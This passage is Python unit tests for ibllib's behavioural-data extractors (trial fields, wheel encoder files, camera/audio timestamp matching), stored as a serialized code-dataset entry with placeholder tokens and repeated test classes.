sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n np.testing.assert_array_equal(matches[matches > -1], expected)\n matches = camera.attribute_times(tsa, tsb, injective=False, take=\n 'nearest')\n expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n with self.assertRaises(ValueError):\n camera.attribute_times(tsa, tsb, injective=False, take='closest')\n\n\n<code token>\n", "<import token>\n<function token>\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' /\n 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' /\n 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' /\n 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' /\n 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[\n 'path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])\n )\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[\n 'path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])\n )\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n\n def test_get_feedbackType(self):\n ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[\n 0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n pl = training_trials.ProbabilityLeft(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = training_trials.ProbabilityLeft(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n pl = biased_trials.ProbabilityLeft(self.biased_lt5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n pl = biased_trials.ProbabilityLeft(self.biased_ge5['path']).extract()[0\n ]\n self.assertTrue(isinstance(pl, np.ndarray))\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([(x in probs) for x in pl]) == len(pl))\n\n def test_get_choice(self):\n choice = training_trials.Choice(session_path=self.training_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = training_trials.Choice(session_path=self.training_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_lt5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n choice = biased_trials.Choice(session_path=self.biased_ge5['path']\n ).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array([(~np.isnan(t['behavior_data'][\n 'States timestamps']['no_go'][0][0])) for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n <function token>\n\n def test_get_rewardVolume(self):\n rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(rv, np.ndarray))\n rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n st = training_trials.StimOnOffFreezeTimes(self.training_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_lt5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = training_trials.StimOnOffFreezeTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n st = biased_trials.StimOnOffFreezeTimes(self.biased_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n <function token>\n\n def test_get_response_times(self):\n rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rt, np.ndarray))\n\n def test_get_goCueTrigger_times(self):\n data = raw.load_data(self.training_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = training_trials.GoCueTriggerTimes(self.training_ge5['path']\n ).extract()[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n gct = np.array([tr['behavior_data']['States timestamps'][\n 'closed_loop'][0][0] for tr in data])\n self.assertTrue(isinstance(gct, np.ndarray))\n gct = biased_trials.GoCueTriggerTimes(self.biased_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(gct, np.ndarray))\n\n def test_get_goCueOnset_times(self):\n gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertTrue(np.all(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[\n 0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 12)\n gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 4)\n gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(gcot, np.ndarray))\n self.assertFalse(np.any(np.isnan(gcot)))\n self.assertTrue(gcot.size != 0 or gcot.size == 8)\n\n def test_get_included_trials_lt5(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials_ge5(self):\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n def test_get_included_trials(self):\n it = training_trials.IncludedTrials(self.training_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = training_trials.IncludedTrials(self.training_ge5['path']).extract(\n )[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(\n settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]\n self.assertTrue(isinstance(it, np.ndarray))\n it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(it, np.ndarray))\n\n @wheelMoves_fixture\n def test_extract_all(self):\n with self.assertRaises(ValueError) as ex:\n training_trials.extract_all(self.training_lt5['path'], settings\n ={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',\n str(ex.exception))\n out, files = training_trials.extract_all(self.training_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'\n ) as Wheel:\n Wheel.var_names = tuple()\n Wheel().extract.return_value = {}, []\n out, files = biased_trials.extract_all(self.biased_lt5['path'],\n settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)\n self.assertEqual(15, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n out, files = biased_trials.extract_all(self.biased_ge5['path'],\n save=True)\n self.assertEqual(19, len(out))\n self.assertTrue(all(map(Path.exists, files)))\n\n def test_encoder_positions_clock_reset(self):\n path = self.training_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,\n 1853979, 1859144])\n self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))\n self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))\n\n def test_encoder_positions_clock_errors(self):\n path = self.biased_lt5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_lt5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n path = self.biased_ge5['path'] / 'raw_behavior_data'\n path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)\n dy = raw._load_encoder_positions_file_ge5(path)\n self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))\n\n def test_wheel_folders(self):\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_lt5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'\n ):\n df = raw._load_encoder_positions_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):\n df = raw._load_encoder_events_file_ge5(wf)\n self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))\n\n def test_load_encoder_positions(self):\n raw.load_encoder_positions(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.training_ge5['path'])\n raw.load_encoder_positions(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_positions(self.biased_ge5['path'])\n\n def test_load_encoder_events(self):\n raw.load_encoder_events(self.training_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.training_ge5['path'])\n raw.load_encoder_events(self.biased_lt5['path'], settings={\n 'IBLRIG_VERSION_TAG': '4.9.9'})\n raw.load_encoder_events(self.biased_ge5['path'])\n\n def test_size_outputs(self):\n from ibllib.io.extractors.bpod_trials import extract_all\n extract_all(self.training_ge5['path'])\n trials = alfio.load_object(self.training_ge5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n extract_all(self.biased_ge5['path'])\n trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n mock_data = {'intervals': np.array([[0, 1]]), 'peakAmplitude': np.\n array([1, 1]), 'peakVelocity_times': np.array([1, 1])}\n function_name = (\n 'ibllib.io.extractors.training_wheel.extract_wheel_moves')\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.training_lt5['path'])\n trials = alfio.load_object(self.training_lt5['path'] / 'alf',\n object='trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n with unittest.mock.patch(function_name, return_value=mock_data):\n extract_all(self.biased_lt5['path'])\n trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object=\n 'trials')\n self.assertTrue(alfio.check_dimensions(trials) == 0)\n <function token>\n\n\nclass TestSyncWheelBpod(unittest.TestCase):\n\n def test_sync_bpod_bonsai_poor_quality_timestamps(self):\n sync_trials_robust = raw.sync_trials_robust\n drift_pol = np.array([11 * 1e-06, -20])\n np.random.seed(seed=784)\n t0_full = np.cumsum(np.random.rand(50)) + 0.001\n t1_full = np.polyval(drift_pol, t0_full) + t0_full\n t0 = t0_full.copy()\n t1 = t1_full.copy()\n t0_, t1_ = sync_trials_robust(t0, t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[:-1])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, t1[1:])\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[1:], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0[:-1], t1)\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))\n assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)\n\n\nclass TestWheelLoaders(unittest.TestCase):\n\n def setUp(self) ->None:\n self.main_path = Path(__file__).parent\n\n def test_encoder_events_corrupt(self):\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_lt5(file_events)\n self.assertTrue(dy.size > 6)\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):\n dy = raw._load_encoder_events_file_ge5(file_events)\n self.assertTrue(dy.size > 6)\n\n def test_encoder_positions_corrupts(self):\n path = self.main_path.joinpath('data', 'wheel', 'ge5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_ge5(file_position)\n self.assertTrue(dy.size > 18)\n path = self.main_path.joinpath('data', 'wheel', 'lt5')\n for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):\n dy = raw._load_encoder_positions_file_lt5(file_position)\n self.assertTrue(dy.size > 18)\n\n\nclass MockExtracor(BaseExtractor):\n save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',\n 'some_file.npy')\n var_names = 'csv', 'ssv', 'tsv', 'npy'\n\n def _extract(self, **kwargs) ->tuple:\n csv = pd.DataFrame([1, 2, 3])\n ssv = pd.DataFrame([1, 2, 3])\n tsv = pd.DataFrame([1, 2, 3])\n npy = np.array([1, 2, 3])\n return csv, ssv, tsv, npy\n\n\nclass TestBaseExtractorSavingMethods(unittest.TestCase):\n\n def setUp(self) ->None:\n self.tempdir = tempfile.TemporaryDirectory()\n self.session_path = self.tempdir.name\n self.mock_extractor = MockExtracor(self.session_path)\n\n def test_saving_method(self):\n data, paths = self.mock_extractor.extract(save=True)\n self.assertTrue(all([x.exists() for x in paths]))\n\n def tearDown(self):\n self.tempdir.cleanup()\n\n\nclass TestCameraExtractors(unittest.TestCase):\n\n def test_groom_pin_state(self):\n fps = 60\n t_offset = 39.4\n ts = np.arange(0, 10, 1 / fps) + t_offset\n ts += np.full_like(ts, 0.0001).cumsum()\n n_pulses = 2\n pulse_width = 0.3\n duty = 0.5\n gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),\n 'polarities': np.ones(n_pulses * 2, dtype=np.int32)}\n gpio['polarities'][1::2] = -1\n aud_offset = 40.0\n audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[\n 'polarities']}\n for p in range(n_pulses):\n i = p * 2\n rise = pulse_width * p + duty * p + 1\n audio['times'][i] = aud_offset + rise\n audio['times'][i + 1] = audio['times'][i] + pulse_width\n rise += t_offset\n gpio['indices'][i] = np.where(ts > rise)[0][0]\n gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]\n gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)\n self.assertEqual(audio, audio_, \"Audio dict shouldn't be effected\")\n np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667, \n 40.033333, 40.05])\n delay = 0.08\n pulse_width = 1e-05\n t = audio['times'][0] + delay\n audio['times'] = np.sort(np.append(audio['times'], [t, t +\n pulse_width, 80]))\n audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)\n audio['polarities'][1::2] = -1\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff\n =0.005)\n self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)\n audio['times'][4] -= 0.3\n gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,\n tolerance=0.1, min_diff=0.005)\n self.assertTrue(np.all(gpio_['times'] == audio_['times']))\n self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))\n\n def test_attribute_times(self, display=False):\n tsa = np.linspace(0, 60, 60 * 4)[:60]\n tsb = np.linspace(0, 60, 60 * 3)[:45]\n tsa = np.sort(np.append(tsa, 0.4))\n tsb = np.sort(np.append(tsb, 0.41))\n if display:\n from ibllib.plots import vertical_lines\n import matplotlib.pyplot as plt\n vertical_lines(tsb, linestyle=':', color='r', label='tsb')\n vertical_lines(tsa, linestyle=':', color='b', label='tsa')\n plt.legend()\n matches = camera.attribute_times(tsa, tsb)\n expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,\n 18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,\n 40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])\n np.testing.assert_array_equal(matches, expected)\n self.assertEqual(matches.size, tsb.size)\n matches = camera.attribute_times(tsa, tsb, take='nearest')\n expected[np.r_[1:3]] = expected[1:3] + 1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, take='after')\n missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23, \n 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]\n expected[missing] = -1\n np.testing.assert_array_equal(matches, expected)\n matches = camera.attribute_times(tsa, tsb, tol=0.05)\n expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,\n 49, 53, 57])\n 